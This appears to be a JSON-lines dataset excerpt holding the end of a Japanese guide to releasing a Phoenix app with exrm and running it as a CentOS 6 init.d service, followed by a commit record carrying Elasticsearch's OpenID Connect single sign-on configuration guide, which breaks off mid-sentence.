\u3067\u306f\u3001 http:\/\/www.phoenixframework.org\/docs\/advanced-deployment[Exrm(Elixir Release Manager)] \u306b\u3088\u308b\u30ea\u30ea\u30fc\u30b9\u30d3\u30eb\u30c9\u3092\u63a8\u5968\u3057\u3066\u3044\u307e\u3059\u3002\u30ea\u30ea\u30fc\u30b9\u4f5c\u696d\u306b\u306f https:\/\/github.com\/bitwalker\/exrm[exrm] \u30d1\u30c3\u30b1\u30fc\u30b8\u304c\u5fc5\u8981\u3067\u3059\u3002phoenix-sample \u306f\u4fee\u6b63\u3055\u308c\u3066\u3044\u308b\u306e\u3067\u3059\u304c\u3001\u305d\u308c\u4ee5\u5916\u306e\u5834\u5408\u306b\u306f mix.exs \u3092\u78ba\u8a8d\u3057\u3066\u3001deps \u306b exrm \u3092\u8ffd\u52a0\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n```\n$ cat mix.exs\n...\n(\u4e2d\u7565)\n...\ndefp deps do\n [{:phoenix, \"~> 1.0,0\"},\n {:phoenix_ecto, \"~> 1.1\"},\n {:postgrex, \">= 0.0.0\"},\n {:phoenix_html, \"~> 2.1\"},\n {:phoenix_live_reload, \"~> 1.0\", only: :dev},\n {:cowboy, \"~> 1.0\"},\n {:exrm, \"~> 0.15.3\"}]\u3000\u3000\u3000\u3000\u3000# \u8ffd\u8a18\nend\n```\n\n\n\n\nbrunch.js \u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u306a\u3044\u5834\u5408\u306f `` npm i -g brunch`` \u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n```\n$ mix deps.get --only prod # \u4f9d\u5b58\u30d5\u30a1\u30a4\u30eb\u306e\u53d6\u5f97\n$ MIX_ENV=prod mix compile # ex \u30d5\u30a1\u30a4\u30eb\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\n$ brunch b -P # asset \u306e\u30d3\u30eb\u30c9\n$ MIX_ENV=prod mix phoenix.digest\n$ MIX_ENV=prod mix ecto.migrate\n$ MIX_ENV=prod mix release\n```\nrelease \u306f\u5c11\u3057\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002\u7d42\u4e86\u3059\u308b\u3068 rel \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u914d\u4e0b\u306b\u30ea\u30ea\u30fc\u30b9\u7528\u30d5\u30a1\u30a4\u30eb\u304c\u751f\u6210\u3055\u308c\u307e\u3059\u3002\u306a\u304a\u3001release \u3092\u3084\u308a\u76f4\u3059\u5834\u5408\u306f ``mix release.clean`` \u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n\n## \u30c7\u30fc\u30e2\u30f3\u3067\u5b9f\u884c\n\nCentOS 6 \u306e service \u306b\u30c7\u30fc\u30e2\u30f3\u3068\u3057\u3066\u767b\u9332\u3059\u308b\u3002Upstart \u306f CentOS6 \u306e\u3082\u306e\u304c 0.6.5 \u3068\u53e4\u304f\u3001\u30e6\u30fc\u30b6\u30fc\u3092\u5207\u308a\u66ff\u3048\u3066\u5b9f\u884c\u304c\u3067\u304d\u306a\u304b\u3063\u305f\u3081\u3001\u4fdd\u7559\u3068\u3057\u307e\u3057\u305f\u3002\u65b0\u3057\u3044 Upstart \u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u304c\u5206\u304b\u308c\u3070\u8a66\u3057\u3066\u307f\u305f\u3044\u3067\u3059\u3002\u516c\u5f0f\u3067\u306f Ubuntu \u3067\u5b9f\u884c\u3059\u308b\u305f\u3081\u306e http:\/\/www.phoenixframework.org\/docs\/advanced-deployment#section-setting-up-our-init-system[Upstart \u306e\u30b9\u30af\u30ea\u30d7\u30c8] \u304c\u516c\u958b\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n\n```\n$ cat \/etc\/init.d\/todo-phoenix\n#!\/bin\/sh\n#\n\n. \/etc\/rc.d\/init.d\/functions\n\nPROG_NAME=todo-phoenix\nUSER=phoenix\nAPP_ROOT=\/home\/phoenix\/git\/phoenix-sample\nMIX_ENV=prod\nSTART_CMD=\"rel\/hello_phoenix\/bin\/hello_phoenix start -detached\"\nSTOP_CMD=\"rel\/hello_phoenix\/bin\/hello_phoenix stop\"\n\nexport PATH=\/usr\/elixir\/bin:\/usr\/local\/bin:$PATH\ncd $APP_ROOT || exit 1\n\ncase $1 in\n start)\n echo -n $\"Starting $PROG_NAME: \"\n sudo -u phoenix $START_CMD\n ;;\n stop)\n echo -n $\"Shutting down $PROG_NAME: \"\n sudo -u phoenix $STOP_CMD\n ;;\n restart)\n echo -n $\"Restarting $PROG_NAME: \"\n sudo -u phoenix $STOP_CMD\n sudo -u phoenix $START_CMD\n ;;\n *)\n echo >&2 \"Usage: $0 <start|stop|restart>\"\n exit 1\n ;;\nesac\nexit $?\n```\n\n\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u3088\u308a ``sudo service todo-phoenix start`` \u3067\u8d77\u52d5\u3057\u3001``sudo service todo-phoenix stop`` \u3067\u505c\u6b62\u3057\u307e\u3059\u3002\u3053\u3053\u3067\u6ce8\u610f\u3059\u308b\u306e\u306f\u3001\u8d77\u52d5\u6642\u306f ``hello_phoenix start -detached`` \u3068 -detached \u30aa\u30d7\u30b7\u30e7\u30f3\u3092\u4ed8\u3051\u3066\u8d77\u52d5\u3059\u308b\u3053\u3068\u3067\u3059\u3002start \u3060\u3051\u3060\u3068\u30c7\u30fc\u30e2\u30f3\u3067\u5b9f\u884c\u3057\u3066\u3082\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u51fa\u529b\u3057\u3066\u3044\u308b\u3089\u3057\u304f\u3001\u8ca0\u8377\u3092\u304b\u3051\u308b\u3068\u30e1\u30e2\u30ea\u30fc\u4e0d\u8db3\u3068\u306a\u308a\u307e\u3059\u3002\n\n\u8a73\u3057\u304f\u306f http:\/\/qiita.com\/maruware\/items\/7765837384795b1d9659[phoenix\u3067mix release\u3057\u305f\u3068\u304d\u306b\u30e1\u30e2\u30ea\u304c\u6ea2\u308c\u308b\u306e\u3092\u89e3\u6c7a - Qiita] \u3092\u53c2\u8003\u306b\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cd58f2a22e5e11689eb266be3e56ddcf9ff41ad0","subject":"Update logout guide for OIDC (#61624)","message":"Update logout guide for OIDC (#61624)\n\nKibana has changed the routes for the `logged_out` page in latest\r\nreleases and also now offers a login selector. This commit updates\r\nthe OIDC guide to reflect that.\r\n","repos":"nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"x-pack\/docs\/en\/security\/authentication\/oidc-guide.asciidoc","new_file":"x-pack\/docs\/en\/security\/authentication\/oidc-guide.asciidoc","new_contents":"[role=\"xpack\"]\n[[oidc-guide]]\n\n== Configuring single sign-on to the {stack} using OpenID Connect\n\nThe Elastic Stack supports single sign-on (SSO) using OpenID Connect via {kib} using\n{es} as the backend service that holds most of the functionality. {kib} and {es}\ntogether represent an OpenID Connect Relying Party (RP) that supports the authorization code flow and implicit flow as these are defined in the OpenID Connect specification.\n\nThis guide assumes that you have an OpenID Connect Provider where the\nElastic Stack Relying Party will be registered.\n\nNOTE: The OpenID Connect realm support in {kib} is designed with the expectation that it\nwill be the primary authentication method for the users of that {kib} instance. The\n<<oidc-kibana>> section describes what this entails and how you can set it up to support\nother realms if necessary.\n\n[[oidc-guide-op]]\n=== The OpenID Connect Provider\n\nThe OpenID Connect Provider (OP) is the entity in OpenID Connect that is responsible for\nauthenticating the user and for granting the necessary tokens with the authentication and\nuser information to be consumed by the Relying Parties.\n\nIn order for the Elastic Stack to be able use your OpenID Connect Provider for authentication,\na trust relationship needs to be established between the OP and the RP. In the OpenID Connect\nProvider, this means registering the RP as a client. OpenID Connect defines a dynamic client\nregistration protocol but this is usually geared towards real-time client registration and\nnot the trust establishment process for cross security domain single sign on. All OPs will\nalso allow for the manual registration of an RP as a client, via a user interface or (less often)\nvia the consumption of a metadata document.\n\nThe process for registering the Elastic Stack RP will be different from OP to OP and following\nthe provider's relevant documentation is prudent. The information for the\nRP that you commonly need to provide for registration are the following:\n\n- `Relying Party Name`: An arbitrary identifier for the relying party. Neither the specification\nnor the Elastic Stack implementation impose any constraints on this value.\n- `Redirect URI`: This is the URI where the OP will redirect the user's browser after authentication. The\nappropriate value for this will depend on your setup and whether or not {kib} sits behind a proxy or\nload balancer. It will typically be +$\\{kibana-url}\/api\/security\/oidc\/callback+ (for the authorization code flow) or +$\\{kibana-url}\/api\/security\/oidc\/implicit+ (for the implicit flow) where _$\\{kibana-url}_ is the base URL for your {kib} instance. You might also see this\ncalled `Callback URI`.\n\nAt the end of the registration process, the OP will assign a Client Identifier and a Client Secret for the RP ({stack}) to use.\nNote these two values as they will be used in the {es} configuration.\n\n[[oidc-guide-authentication]]\n=== Configure {es} for OpenID Connect authentication\n\nThe following is a summary of the configuration steps required in order to enable authentication\nusing OpenID Connect in {es}:\n\n. <<oidc-enable-http,Enable SSL\/TLS for HTTP>>\n. <<oidc-enable-token,Enable the Token Service>>\n. <<oidc-create-realm,Create one or more OpenID Connect realms>>\n. <<oidc-role-mapping,Configure role mappings>>\n\n[[oidc-enable-http]]\n==== Enable TLS for HTTP\n\nIf your {es} cluster is operating in production mode, then you must\nconfigure the HTTP interface to use SSL\/TLS before you can enable OpenID Connect\nauthentication.\n\nFor more information, see\n<<tls-http>>.\n\n[[oidc-enable-token]]\n==== Enable the token service\n\nThe {es} OpenID Connect implementation makes use of the {es} Token Service. This service\nis automatically enabled if you configure TLS on the HTTP interface, and can be\nexplicitly configured by including the following in your `elasticsearch.yml` file:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.token.enabled: true\n------------------------------------------------------------\n\n[[oidc-create-realm]]\n==== Create an OpenID Connect realm\n\nOpenID Connect based authentication is enabled by configuring the appropriate realm within\nthe authentication chain for {es}.\n\nThis realm has a few mandatory settings, and a number of optional settings.\nThe available settings are described in detail in\n<<ref-oidc-settings>>. This\nguide will explore the most common settings.\n\nCreate an OpenID Connect (the realm type is `oidc`) realm in your `elasticsearch.yml` file\nsimilar to what is shown below:\n\nNOTE: The values used below are meant to be an example and are not intended to apply to\nevery use case. The details below the configuration snippet provide insights and suggestions\nto help you pick the proper values, depending on your OP configuration.\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 2\n rp.client_id: \"the_client_id\"\n rp.response_type: code\n rp.redirect_uri: \"https:\/\/kibana.example.org:5601\/api\/security\/oidc\/callback\"\n op.issuer: \"https:\/\/op.example.org\"\n op.authorization_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/authorize\"\n op.token_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/token\"\n op.jwkset_path: oidc\/jwkset.json\n op.userinfo_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/userinfo\"\n op.endsession_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/logout\"\n rp.post_logout_redirect_uri: \"https:\/\/kibana.example.org:5601\/security\/logged_out\"\n claims.principal: sub\n claims.groups: \"http:\/\/example.info\/claims\/groups\"\n-------------------------------------------------------------------------------------\n\nThe configuration values used in the example above are:\n\nxpack.security.authc.realms.oidc.oidc1::\n This defines a new `oidc` authentication realm named \"oidc1\".\n See <<realms>> for more explanation of realms.\n\norder::\n You should define a unique order on each realm in your authentication chain.\n It is recommended that the OpenID Connect realm be at the bottom of your authentication\n chain (that is, that it has the _highest_ order).\n\nrp.client_id::\n This, usually opaque, arbitrary string, is the Client Identifier that was assigned to the Elastic Stack RP by the OP upon\n registration.\n\nrp.response_type::\n This is an identifier that controls which OpenID Connect authentication flow this RP supports and also\n which flow this RP requests the OP should follow. Supported values are\n - `code`, which means that the RP wants to use the Authorization Code flow. If your OP supports the\n Authorization Code flow, you should select this instead of the Implicit Flow.\n - `id_token token` which means that the RP wants to use the Implicit flow and we also request an oAuth2\n access token from the OP, that we can potentially use for follow up requests ( UserInfo ). This\n should be selected if the OP offers a UserInfo endpoint in its configuration, or if you know that\n the claims you will need to use for role mapping are not available in the ID Token.\n - `id_token` which means that the RP wants to use the Implicit flow, but is not interested in getting\n an oAuth2 token too. Select this if you are certain that all necessary claims will be contained in\n the ID Token or if the OP doesn't offer a User Info endpoint.\n\nrp.redirect_uri::\n The redirect URI where the OP will redirect the browser after authentication. This needs to be\n _exactly_ the same as the one <<oidc-guide-op, configured with the OP upon registration>> and will\n typically be +$\\{kibana-url}\/api\/security\/oidc\/callback+ where _$\\{kibana-url}_ is the base URL for your {kib} instance\n\nop.issuer::\n A verifiable Identifier for your OpenID Connect Provider. An Issuer Identifier is usually a case sensitive URL.\n The value for this setting should be provided by your OpenID Connect Provider.\n\nop.authorization_endpoint::\n The URL for the Authorization Endpoint in the OP. This is where the user's browser\n will be redirected to start the authentication process. The value for this setting should be provided by your\n OpenID Connect Provider.\n\nop.token_endpoint::\n The URL for the Token Endpoint in the OpenID Connect Provider. This is the endpoint where\n {es} will send a request to exchange the code for an ID Token. This setting is optional when\n you use the implicit flow. The value for this setting should be provided by your OpenID Connect Provider.\n\nop.jwkset_path::\n The path to a file or a URL containing a JSON Web Key Set with the key material that the OpenID Connect\n Provider uses for signing tokens and claims responses. If a path is set, it is resolved relative to the {es}\n config directory.\n {es} will automatically monitor this file for changes and will reload the configuration whenever\n it is updated. Your OpenID Connect Provider should provide you with this file or a URL where it is available.\n\nop.userinfo_endpoint::\n (Optional) The URL for the UserInfo Endpoint in the OpenID Connect Provider. This is the endpoint of the OP that\n can be queried to get further user information, if required. The value for this setting should be provided by your\n OpenID Connect Provider.\n\nop.endsession_endpoint::\n (Optional) The URL to the End Session Endpoint in the OpenID Connect Provider. This is the endpoint where the user's\n browser will be redirected after local logout, if the realm is configured for RP initiated Single Logout and\n the OP supports it. The value for this setting should be provided by your OpenID Connect Provider.\n\nrp.post_logout_redirect_uri::\n (Optional) The Redirect URL where the OpenID Connect Provider should redirect the user after a\n successful Single Logout (assuming `op.endsession_endpoint` above is also set). This should be set to a value that\n will not trigger a new OpenID Connect Authentication, such as +$\\{kibana-url}\/security\/logged_out+ or\n +$\\{kibana-url}\/login?msg=LOGGED_OUT+ where _$\\{kibana-url}_ is the base URL for your {kib} instance.\n\nclaims.principal:: See <<oidc-claims-mapping>>.\nclaims.groups:: See <<oidc-claims-mapping>>.\n\nA final piece of configuration of the OpenID Connect realm is to set the `Client Secret` that was assigned\nto the RP during registration in the OP. This is a secure setting and as such is not defined in the realm\nconfiguration in `elasticsearch.yml` but added to the\n<<secure-settings,elasticsearch keystore>>.\nFor instance\n\n\n[source,sh]\n----\nbin\/elasticsearch-keystore add xpack.security.authc.realms.oidc.oidc1.rp.client_secret\n----\n\n\nNOTE: According to the OpenID Connect specification, the OP should also make their configuration\navailable at a well known URL, which is the concatenation of their `Issuer` value with the\n`.well-known\/openid-configuration` string. For example: `https:\/\/op.org.com\/.well-known\/openid-configuration`\nThat document should contain all the necessary information to configure the OpenID Connect realm in {es}.\n\n\n[[oidc-claims-mapping]]\n==== Claims mapping\n\n===== Claims and scopes\n\nWhen authenticating to {kib} using OpenID Connect, the OP will provide information about the user\nin the form of OpenID Connect Claims, that can be included either in the ID Token, or be retrieved from the\nUserInfo endpoint of the OP. The claim is defined as a piece of information asserted by the OP\nfor the authenticated user. Simply put, a claim is a name\/value pair that contains information about\nthe user. Related to claims, we also have the notion of OpenID Connect Scopes. Scopes are identifiers\nthat are used to request access to specific lists of claims. The standard defines a set of scope\nidentifiers that can be requested. The only mandatory one is `openid`, while commonly used ones are\n`profile` and `email`. The `profile` scope requests access to the `name`,`family_name`,`given_name`,`middle_name`,`nickname`,\n`preferred_username`,`profile`,`picture`,`website`,`gender`,`birthdate`,`zoneinfo`,`locale`, and `updated_at` claims.\nThe `email` scope requests access to the `email` and `email_verified` claims. The process is that\nthe RP requests specific scopes during the authentication request. If the OP Privacy Policy\nallows it and the authenticating user consents to it, the related claims are returned to the\nRP (either in the ID Token or as a UserInfo response).\n\nThe list of the supported claims will vary depending on the OP you are using, but you can expect\nthe https:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[Standard Claims] to be\nlargely supported.\n\n[[oidc-claim-to-property]]\n===== Mapping claims to user properties\n\nThe goal of claims mapping is to configure {es} in such a way as to be able to map the values of\nspecified returned claims to one of the <<oidc-user-properties, user properties>> that are supported\nby {es}. These user properties are then utilized to identify the user in the {kib} UI or the audit\nlogs, and can also be used to create <<oidc-role-mapping, role mapping>> rules.\n\nThe recommended steps for configuring OpenID Claims mapping are as follows:\n\n. Consult your OP configuration to see what claims it might support. Note that\n the list provided in the OP's metadata or in the configuration page of the OP\n is a list of potentially supported claims. However, for privacy reasons it might\n not be a complete one, or not all supported claims will be available for all\n authenticated users.\n\n. Read through the list of <<oidc-user-properties, user properties>> that {es}\n supports, and decide which of them are useful to you, and can be provided by\n your OP in the form of claims. At a _minimum_, the `principal` user property\n is required.\n\n. Configure your OP to \"release\" those claims to your {stack} Relying\n party. This process greatly varies by provider. You can use a static\n configuration while others will support that the RP requests the scopes that\n correspond to the claims to be \"released\" on authentication time. See\n <<ref-oidc-settings,`rp.requested_scopes`>> for details about how\n to configure the scopes to request. To ensure interoperability and minimize\n the errors, you should only request scopes that the OP supports, and which you\n intend to map to {es} user properties.\n\n NOTE: You can only map claims with values that are strings, numbers, boolean values or an array\n of the aforementioned.\n\n. Configure the OpenID Connect realm in {es} to associate the {es} user properties (see\n <<oidc-user-properties, the listing>> below), to the name of the claims that your\n OP will release. In the example above, we have configured the `principal` and\n `groups` user properties as follows:\n\n .. `claims.principal: sub` : This instructs {es} to look for the OpenID Connect claim named `sub`\n in the ID Token that the OP issued for the user ( or in the UserInfo response ) and assign the\n value of this claim to the `principal` user property. `sub` is a commonly used claim for the\n principal property as it is an identifier of the user in the OP and it is also a required\n claim of the ID Token, thus offering guarantees that it will be available. It is, however,\n only used as an example here, the OP may provide another claim that is a better fit for your needs.\n\n .. `claims.groups: \"http:\/\/example.info\/claims\/groups\"` : Similarly, this instructs {es} to look\n for the claim with the name `http:\/\/example.info\/claims\/groups` (note that this is a URI - an\n identifier, treated as a string and not a URL pointing to a location that will be retrieved)\n either in the ID Token or in the UserInfo response, and map the value(s) of it to the user\n property `groups` in {es}. There is no standard claim in the specification that is used for\n expressing roles or group memberships of the authenticated user in the OP, so the name of the\n claim that should be mapped here, will vary greatly between providers. Consult your OP\n documentation for more details.\n\n[[oidc-user-properties]]\n===== {es} user properties\n\nThe {es} OpenID Connect realm can be configured to map OpenID Connect claims to the\nfollowing properties on the authenticated user:\n\nprincipal:: _(Required)_\n This is the _username_ that will be applied to a user that authenticates\n against this realm.\n The `principal` appears in places such as the {es} audit logs.\n\nNOTE: If the principal property fails to be mapped from a claim, the authentication fails.\n\ngroups:: _(Recommended)_\n If you wish to use your OP's concept of groups or roles as the basis for a\n user's {es} privileges, you should map them with this property.\n The `groups` are passed directly to your <<oidc-role-mapping, role mapping rules>>.\n\nname:: _(Optional)_ The user's full name.\nmail:: _(Optional)_ The user's email address.\ndn:: _(Optional)_ The user's X.500 _Distinguished Name_.\n\n\n===== Extracting partial values from OpenID Connect claims\n\nThere are some occasions where the value of a claim may contain more information\nthan you wish to use within {es}. A common example of this is one where the\nOP works exclusively with email addresses, but you would like the user's\n`principal` to use the _local-name_ part of the email address.\nFor example if their email address was `james.wong@staff.example.com`, then you\nwould like their principal to simply be `james.wong`.\n\nThis can be achieved using the `claim_patterns` setting in the {es}\nrealm, as demonstrated in the realm configuration below:\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 2\n rp.client_id: \"the_client_id\"\n rp.response_type: code\n rp.redirect_uri: \"https:\/\/kibana.example.org:5601\/api\/security\/oidc\/callback\"\n op.authorization_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/authorize\"\n op.token_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/token\"\n op.userinfo_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/userinfo\"\n op.endsession_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/logout\"\n op.issuer: \"https:\/\/op.example.org\"\n op.jwkset_path: oidc\/jwkset.json\n claims.principal: email_verified\n claim_patterns.principal: \"^([^@]+)@staff\\\\.example\\\\.com$\"\n-------------------------------------------------------------------------------------\n\nIn this case, the user's `principal` is mapped from the `email_verified` claim, but a\nregular expression is applied to the value before it is assigned to the user.\nIf the regular expression matches, then the result of the first group is used as the\neffective value. If the regular expression does not match then the claim\nmapping fails.\n\nIn this example, the email address must belong to the `staff.example.com` domain,\nand then the local-part (anything before the `@`) is used as the principal.\nAny users who try to login using a different email domain will fail because the\nregular expression will not match against their email address, and thus their\nprincipal user property - which is mandatory - will not be populated.\n\nIMPORTANT: Small mistakes in these regular expressions can have significant\nsecurity consequences. For example, if we accidentally left off the trailing\n`$` from the example above, then we would match any email address where the\ndomain starts with `staff.example.com`, and this would accept an email\naddress such as `admin@staff.example.com.attacker.net`. It is important that\nyou make sure your regular expressions are as precise as possible so that\nyou do not inadvertently open an avenue for user impersonation attacks.\n\n[[third-party-login]]\n==== Third party initiated single sign-on\n\nThe Open ID Connect realm in {es} supports 3rd party initiated login as described in the\nhttps:\/\/openid.net\/specs\/openid-connect-core-1_0.html#ThirdPartyInitiatedLogin[relevant specification].\n\nThis allows the OP itself or another, third party other than the RP, to initiate the authentication\nprocess while requesting the OP to be used for the authentication. Please note that the Elastic\nStack RP should already be configured for this OP, in order for this process to succeed.\n\n\n[[oidc-logout]]\n==== OpenID Connect Logout\n\nThe OpenID Connect realm in {es} supports RP-Initiated Logout Functionality as\ndescribed in the\nhttps:\/\/openid.net\/specs\/openid-connect-session-1_0.html#RPLogout[relevant part of the specification]\n\nIn this process, the OpenID Connect RP (the Elastic Stack in this case) will redirect the user's\nbrowser to predefined URL of the OP after successfully completing a local logout. The OP can then\nlogout the user also, depending on the configuration, and should finally redirect the user back to the\nRP. The `op.endsession_endpoint` in the realm configuration determines the URL in the OP that the browser\nwill be redirected to. The `rp.post_logout_redirect_uri` setting determines the URL to redirect\nthe user back to after the OP logs them out.\n\nWhen configuring `rp.post_logout_redirect_uri`, care should be taken to not point this to a URL that\nwill trigger re-authentication of the user. For instance, when using OpenID Connect to support\nsingle sign-on to {kib}, this could be set to either +$\\{kibana-url}\/security\/logged_out+, which will show a\nuser-friendly message to the user or +$\\{kibana-url}\/login?msg=LOGGED_OUT+ which will take the user to the login selector in {kib}.\n\n[[oidc-ssl-config]]\n==== OpenID Connect Realm SSL Configuration\n\nOpenID Connect depends on TLS to provide security properties such as encryption in transit and endpoint authentication. The RP\nis required to establish back-channel communication with the OP in order to exchange the code for an ID Token during the\nAuthorization code grant flow and in order to get additional user information from the UserInfo endpoint. Furthermore, if\nyou configure `op.jwks_path` as a URL, {es} will need to get the OP's signing keys from the file hosted there. As such, it is\nimportant that {es} can validate and trust the server certificate that the OP uses for TLS. Since the system truststore is\nused for the client context of outgoing https connections, if your OP is using a certificate from a trusted CA, no additional\nconfiguration is needed.\n\nHowever, if the issuer of your OP's certificate is not trusted by the JVM on which {es} is running (e.g it uses a organization CA), then you must configure\n{es} to trust that CA. Assuming that you have the CA certificate that has signed the certificate that the OP uses for TLS\nstored in the \/oidc\/company-ca.pem` file stored in the configuration directory of {es}, you need to set the following\nproperty in the realm configuration:\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 1\n ...\n ssl.certificate_authorities: [\"\/oidc\/company-ca.pem\"]\n-------------------------------------------------------------------------------------\n\n[[oidc-role-mapping]]\n=== Configuring role mappings\n\nWhen a user authenticates using OpenID Connect, they are identified to the Elastic Stack,\nbut this does not automatically grant them access to perform any actions or\naccess any data.\n\nYour OpenID Connect users cannot do anything until they are assigned roles. This can be done\nthrough either the\n<<security-api-put-role-mapping,add role mapping API>> or with\n<<authorization_realms,authorization realms>>.\n\nNOTE: You cannot use <<mapping-roles-file,role mapping files>>\nto grant roles to users authenticating via OpenID Connect.\n\nThis is an example of a simple role mapping that grants the `example_role` role\nto any user who authenticates against the `oidc1` OpenID Connect realm:\n\n[source,console]\n--------------------------------------------------\nPUT \/_security\/role_mapping\/oidc-example\n{\n \"roles\": [ \"example_role\" ], <1>\n \"enabled\": true,\n \"rules\": {\n \"field\": { \"realm.name\": \"oidc1\" }\n }\n}\n--------------------------------------------------\n\n<1> The `example_role` role is *not* a builtin Elasticsearch role.\nThis example assumes that you have created a custom role of your own, with\nappropriate access to your <<roles-indices-priv,data streams, indices,>> and\n{kibana-ref}\/kibana-privileges.html#kibana-feature-privileges[Kibana features].\n\nThe user properties that are mapped via the realm configuration are used to process\nrole mapping rules, and these rules determine which roles a user is granted.\n\nThe user fields that are provided to the role\nmapping are derived from the OpenID Connect claims as follows:\n\n- `username`: The `principal` user property\n- `dn`: The `dn` user property\n- `groups`: The `groups` user property\n- `metadata`: See <<oidc-user-metadata>>\n\nFor more information, see <<mapping-roles>> and\n<<security-role-mapping-apis>>.\n\nIf your OP has the ability to provide groups or roles to RPs via tha use of\nan OpenID Claim, then you should map this claim to the `claims.groups` setting in\nthe {es} realm (see <<oidc-claim-to-property>>), and then make use of it in a role mapping\nas per the example below.\n\nThis mapping grants the {es} `finance_data` role, to any users who authenticate\nvia the `oidc1` realm with the `finance-team` group membership.\n\n[source,console]\n--------------------------------------------------\nPUT \/_security\/role_mapping\/oidc-finance\n{\n \"roles\": [ \"finance_data\" ],\n \"enabled\": true,\n \"rules\": { \"all\": [\n { \"field\": { \"realm.name\": \"oidc1\" } },\n { \"field\": { \"groups\": \"finance-team\" } }\n ] }\n}\n--------------------------------------------------\n\nIf your users also exist in a repository that can be directly accessed by {es}\n(such as an LDAP directory) then you can use\n<<authorization_realms, authorization realms>> instead of role mappings.\n\nIn this case, you perform the following steps:\n1. In your OpenID Connect realm, assign a claim to act as the lookup userid,\n by configuring the `claims.principal` setting.\n2. Create a new realm that can lookup users from your local repository (e.g. an\n `ldap` realm)\n3. In your OpenID Connect realm, set `authorization_realms` to the name of the realm you\n created in step 2.\n\n[[oidc-user-metadata]]\n=== User metadata\n\nBy default users who authenticate via OpenID Connect will have some additional metadata\nfields. These fields will include every OpenID Claim that is provided in the authentication response\n(regardless of whether it is mapped to an {es} user property). For example,\nin the metadata field `oidc(claim_name)`, \"claim_name\" is the name of the\nclaim as it was contained in the ID Token or in the User Info response. Note that these will\ninclude all the https:\/\/openid.net\/specs\/openid-connect-core-1_0.html#IDToken[ID Token claims]\nthat pertain to the authentication event, rather than the user themselves.\n\nThis behaviour can be disabled by adding `populate_user_metadata: false` as\na setting in the oidc realm.\n\n[[oidc-kibana]]\n=== Configuring {kib}\n\nOpenID Connect authentication in {kib} requires a small number of additional settings\nin addition to the standard {kib} security configuration. The\n{kibana-ref}\/using-kibana-with-security.html[{kib} security documentation]\nprovides details on the available configuration options that you can apply.\n\nIn particular, since your {es} nodes have been configured to use TLS on the HTTP\ninterface, you must configure {kib} to use a `https` URL to connect to {es}, and\nyou may need to configure `elasticsearch.ssl.certificateAuthorities` to trust\nthe certificates that {es} has been configured to use.\n\nOpenID Connect authentication in {kib} is also subject to the\n`xpack.security.sessionTimeout` setting that is described in the {kib} security\ndocumentation, and you may wish to adjust this timeout to meet your local needs.\n\nThe three additional settings that are required for OpenID Connect support are shown below:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.providers:\n oidc.oidc1:\n order: 0\n realm: \"oidc1\"\n------------------------------------------------------------\n\nThe configuration values used in the example above are:\n\n`xpack.security.authc.providers`::\nAdd `oidc` provider to instruct {kib} to use OpenID Connect single sign-on as the\nauthentication method. This instructs Kibana to attempt to initiate an SSO flow\neverytime a user attempts to access a URL in Kibana, if the user is not already\nauthenticated. If you also want to allow users to login with a username and password,\nyou must enable the `basic` authentication provider too. For example:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.providers:\n oidc.oidc1:\n order: 0\n realm: \"oidc1\"\n basic.basic1:\n order: 1\n------------------------------------------------------------\n\nThis will allow users that haven't already authenticated with OpenID Connect to\nlog in using the {kib} login form.\n\n`xpack.security.authc.providers.oidc.<provider-name>.realm`::\nThe name of the OpenID Connect realm in {es} that should handle authentication\nfor this Kibana instance.\n\n[[oidc-without-kibana]]\n=== OpenID Connect without {kib}\n\nThe OpenID Connect realm is designed to allow users to authenticate to {kib} and as\nsuch, most of the parts of the guide above make the assumption that {kib} is used.\nThis section describes how a custom web application could use the relevant OpenID\nConnect REST APIs in order to authenticate the users to {es}, with OpenID Connect.\n\nSingle sign-on realms such as OpenID Connect and SAML make use of the Token Service in\n{es} and in principle exchange a SAML or OpenID Connect Authentication response for\nan {es} access token and a refresh token. The access token is used as credentials for subsequent calls to {es}. The\nrefresh token enables the user to get new {es} access tokens after the current one\nexpires.\n\nNOTE: The {es} Token Service can be seen as a minimal oAuth2 authorization server\nand the access token and refresh token mentioned above are tokens that pertain\n_only_ to this authorization server. They are generated and consumed _only_ by {es}\nand are in no way related 